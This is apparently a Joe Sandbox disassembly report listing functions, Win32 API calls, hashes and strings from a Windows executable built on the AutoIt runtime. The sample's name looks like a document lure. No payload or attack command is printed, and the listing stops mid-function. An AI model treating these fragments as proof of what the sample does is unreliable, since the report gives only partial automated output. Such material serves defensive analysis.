                                                        • Opcode ID: b6965b1c624f332cbbf8b1b3595142fe7396d0572caa3bd5338ab95b0e149681
                                                        • Instruction ID: fbbfbb7a763d85a9b61823745e5bfa81127cc97844c676814173933b0fef93ba
                                                        • Opcode Fuzzy Hash: b6965b1c624f332cbbf8b1b3595142fe7396d0572caa3bd5338ab95b0e149681
                                                        • Instruction Fuzzy Hash: 86D05E3226090EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835EB60
                                                        Function 007EA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007EA12A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 5f1540a85582dd52ddf7a5adb277767a0498ee93f106fe9f361378ce79962cf2
                                                        • Instruction ID: f63e4b2fa9f22f18c7bf24c63609cd07ce08dde969213056081e26e727c92e02
                                                        • Opcode Fuzzy Hash: 5f1540a85582dd52ddf7a5adb277767a0498ee93f106fe9f361378ce79962cf2
                                                        • Instruction Fuzzy Hash: BFA0123000010CA78A001F41EC048447F5CE601594B004020F50C40122873254108580
                                                        Function 007D8808 Relevance: .6, Instructions: 590COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df0e86ddb81e1b9b6121eac8a282a3d08f597f8cecac8757fa9a6fcdedff8def
                                                        • Instruction ID: bd607d7285e37449cd0a896dc8364c5c462df5fe31e18cd6ec17900c06b87244
                                                        • Opcode Fuzzy Hash: df0e86ddb81e1b9b6121eac8a282a3d08f597f8cecac8757fa9a6fcdedff8def
                                                        • Instruction Fuzzy Hash: A0224530604506CBCF788A64C4A47BC77B5FF81344F68806BD996CB696EB78EED1C642
                                                        Function 007E21C5 Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: b247fd32c0bcbec3375277c048a03a336cf6ae2772b29a1ebf3cb8b454f36fd2
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 82C185322060D30ADF2D863B883503EBAA55EA67B135A075DD4B3CF5D5EE28C976D620
                                                        Function 007E25FA Relevance: .3, Instructions: 341COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: f32b71319f1f8fbbabbc7fd6d8e5b815a5577d1602158a7855f16ff9373e6461
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: FCC1C5322060D309DF2D863BC83503EBBA55EA67B135A076DD4B2DF4D6EE28C975D620
                                                        Function 007E1978 Relevance: .3, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 6a5681effb3431e58ecf07a8096dbc24831842a5304f682e1780be659596f569
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 87C185723061D309DF2D863B883603EBAA15E967B139A076DD4B2CF5D4EE38C975D620
                                                        Function 00837806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 0083785B
                                                        • DeleteObject.GDI32(00000000), ref: 0083786D
                                                        • DestroyWindow.USER32 ref: 0083787B
                                                        • GetDesktopWindow.USER32 ref: 00837895
                                                        • GetWindowRect.USER32(00000000), ref: 0083789C
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008379DD
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008379ED
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837A35
                                                        • GetClientRect.USER32(00000000,?), ref: 00837A41
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00837A7B
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837A9D
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837AB0
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837ABB
                                                        • GlobalLock.KERNEL32(00000000), ref: 00837AC4
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837AD3
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00837ADC
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837AE3
                                                        • GlobalFree.KERNEL32(00000000), ref: 00837AEE
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837B00
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00852CAC,00000000), ref: 00837B16
                                                        • GlobalFree.KERNEL32(00000000), ref: 00837B26
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00837B4C
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00837B6B
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837B8D
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837D7A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: fc12006168028c80a9196312a13211dbffef1e0b66453f4f2d5a59d2b66a3f4c
                                                        • Instruction ID: 3ea6536c0a6602d198268be6d6ff2f6cdb003f0ab813ec155ea9053587161aa9
                                                        • Opcode Fuzzy Hash: fc12006168028c80a9196312a13211dbffef1e0b66453f4f2d5a59d2b66a3f4c
                                                        • Instruction Fuzzy Hash: 7E023B75900119EFDB14DFA8DD89EAE7BB9FB49310F144158FA15EB2A1CB34AD01CB60
                                                        Function 0084356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,0084F910), ref: 00843627
                                                        • IsWindowVisible.USER32(?), ref: 0084364B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: ea610b65d2836ad846583e97e82e84cfc420db8de09097d8ee26fc96b9e09ccd
                                                        • Instruction ID: 3af302000366ba78f61d6ac634ca5c4d182135169be42558c9772d561ff7f8d0
                                                        • Opcode Fuzzy Hash: ea610b65d2836ad846583e97e82e84cfc420db8de09097d8ee26fc96b9e09ccd
                                                        • Instruction Fuzzy Hash: B0D16130204309DBCB04EF14C45AA6E7BA5FF55354F15846CF985DB2A2DB35EE8ACB81
                                                        Function 0084A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0084A630
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0084A661
                                                        • GetSysColor.USER32(0000000F), ref: 0084A66D
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0084A687
                                                        • SelectObject.GDI32(?,00000000), ref: 0084A696
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0084A6C1
                                                        • GetSysColor.USER32(00000010), ref: 0084A6C9
                                                        • CreateSolidBrush.GDI32(00000000), ref: 0084A6D0
                                                        • FrameRect.USER32(?,?,00000000), ref: 0084A6DF
                                                        • DeleteObject.GDI32(00000000), ref: 0084A6E6
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0084A731
                                                        • FillRect.USER32(?,?,00000000), ref: 0084A763
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084A78E
                                                          • Part of subcall function 0084A8CA: GetSysColor.USER32(00000012), ref: 0084A903
                                                          • Part of subcall function 0084A8CA: SetTextColor.GDI32(?,?), ref: 0084A907
                                                          • Part of subcall function 0084A8CA: GetSysColorBrush.USER32(0000000F), ref: 0084A91D
                                                          • Part of subcall function 0084A8CA: GetSysColor.USER32(0000000F), ref: 0084A928
                                                          • Part of subcall function 0084A8CA: GetSysColor.USER32(00000011), ref: 0084A945
                                                          • Part of subcall function 0084A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0084A953
                                                          • Part of subcall function 0084A8CA: SelectObject.GDI32(?,00000000), ref: 0084A964
                                                          • Part of subcall function 0084A8CA: SetBkColor.GDI32(?,00000000), ref: 0084A96D
                                                          • Part of subcall function 0084A8CA: SelectObject.GDI32(?,?), ref: 0084A97A
                                                          • Part of subcall function 0084A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0084A999
                                                          • Part of subcall function 0084A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0084A9B0
                                                          • Part of subcall function 0084A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0084A9C5
                                                          • Part of subcall function 0084A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0084A9ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: 5981885488edb5d20af7c175098479df2db59057b861c2512a700763df9707c1
                                                        • Instruction ID: a9365b404243b25629ea02028c81318c96c2c1badae147a932c6e070732de009
                                                        • Opcode Fuzzy Hash: 5981885488edb5d20af7c175098479df2db59057b861c2512a700763df9707c1
                                                        • Instruction Fuzzy Hash: AF918C76008305EFD7119F64DC08A5BBBA9FF89321F110A2DFAA2DA1A2D771D944CB52
                                                        Function 007C2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?), ref: 007C2CA2
                                                        • DeleteObject.GDI32(00000000), ref: 007C2CE8
                                                        • DeleteObject.GDI32(00000000), ref: 007C2CF3
                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 007C2CFE
                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 007C2D09
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 007FC43B
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007FC474
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007FC89D
                                                          • Part of subcall function 007C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007C2036,?,00000000,?,?,?,?,007C16CB,00000000,?), ref: 007C1B9A
                                                        • SendMessageW.USER32(?,00001053), ref: 007FC8DA
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007FC8F1
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007FC907
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007FC912
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 464785882-4108050209
                                                        • Opcode ID: 6ca5862a7ce12ea79293b4a792a92b5ebc4357bb1f3676ef7c433fdaa41bfa74
                                                        • Instruction ID: 4e420ceb736a7089e9dcfe892827877bc027689eaa33fb01022190798257ecec
                                                        • Opcode Fuzzy Hash: 6ca5862a7ce12ea79293b4a792a92b5ebc4357bb1f3676ef7c433fdaa41bfa74
                                                        • Instruction Fuzzy Hash: E812AE34604209EFDB26CF24C988BB9B7E1BF45310F54456DE655CB262CB39EC52CBA1
                                                        Function 008374AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 008374DE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0083759D
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008375DB
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008375ED
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00837633
                                                        • GetClientRect.USER32(00000000,?), ref: 0083763F
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00837683
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00837692
                                                        • GetStockObject.GDI32(00000011), ref: 008376A2
                                                        • SelectObject.GDI32(00000000,00000000), ref: 008376A6
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008376B6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008376BF
                                                        • DeleteDC.GDI32(00000000), ref: 008376C8
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008376F4
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0083770B
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00837746
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0083775A
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0083776B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0083779B
                                                        • GetStockObject.GDI32(00000011), ref: 008377A6
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008377B1
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008377BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 94a3aa8fb4db8073ceb9559d02f2c05b285f64cd625cd9905f94693f3c40286d
                                                        • Instruction ID: e4c606543a942672efcb30bf606e926971e9f8fd99273923589d5c1814c79257
                                                        • Opcode Fuzzy Hash: 94a3aa8fb4db8073ceb9559d02f2c05b285f64cd625cd9905f94693f3c40286d
                                                        • Instruction Fuzzy Hash: F4A162B5A40615BFEB14DBA8DC49FAE7BA9FB49710F004118FA15E72E1DB74AD00CB60
                                                        Function 0082AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082AD1E
                                                        • GetDriveTypeW.KERNEL32(?,0084FAC0,?,\\.\,0084F910), ref: 0082ADFB
                                                        • SetErrorMode.KERNEL32(00000000,0084FAC0,?,\\.\,0084F910), ref: 0082AF59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 5fa60ab008efad7b1a461b00cef73ba15d3a1b57bb27606fc430378bcd213dbc
                                                        • Instruction ID: 70e2a6951c29cc5e1d29b9643053f8975c0e8a44bc5d3c826110cb87373e459d
                                                        • Opcode Fuzzy Hash: 5fa60ab008efad7b1a461b00cef73ba15d3a1b57bb27606fc430378bcd213dbc
                                                        • Instruction Fuzzy Hash: 2F5193B5684229EB8B18DB10FA5ADBDB361FF08714720805BE41AE7291DE39DD81DB43
                                                        Function 007C68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: 690087f3b53898f563e62d5ffc952d0e5dd66bfa3e10ae5c0f66118fa1d89bbe
                                                        • Instruction ID: 2bc792543076434fbeb268b474ab0caed2351b9127429e50e0099c6e1a50a44c
                                                        • Opcode Fuzzy Hash: 690087f3b53898f563e62d5ffc952d0e5dd66bfa3e10ae5c0f66118fa1d89bbe
                                                        • Instruction Fuzzy Hash: 97810BB1640209EACB10AA61DCCBFBE3768EF19710F14402CF905AB296EB7DDE45C691
                                                        Function 008489D5 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00848AC1
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00848AD2
                                                        • CharNextW.USER32(0000014E), ref: 00848B01
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00848B42
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00848B58
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00848B69
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00848B86
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00848BD8
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00848BEE
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00848C1F
                                                        • _memset.LIBCMT ref: 00848C44
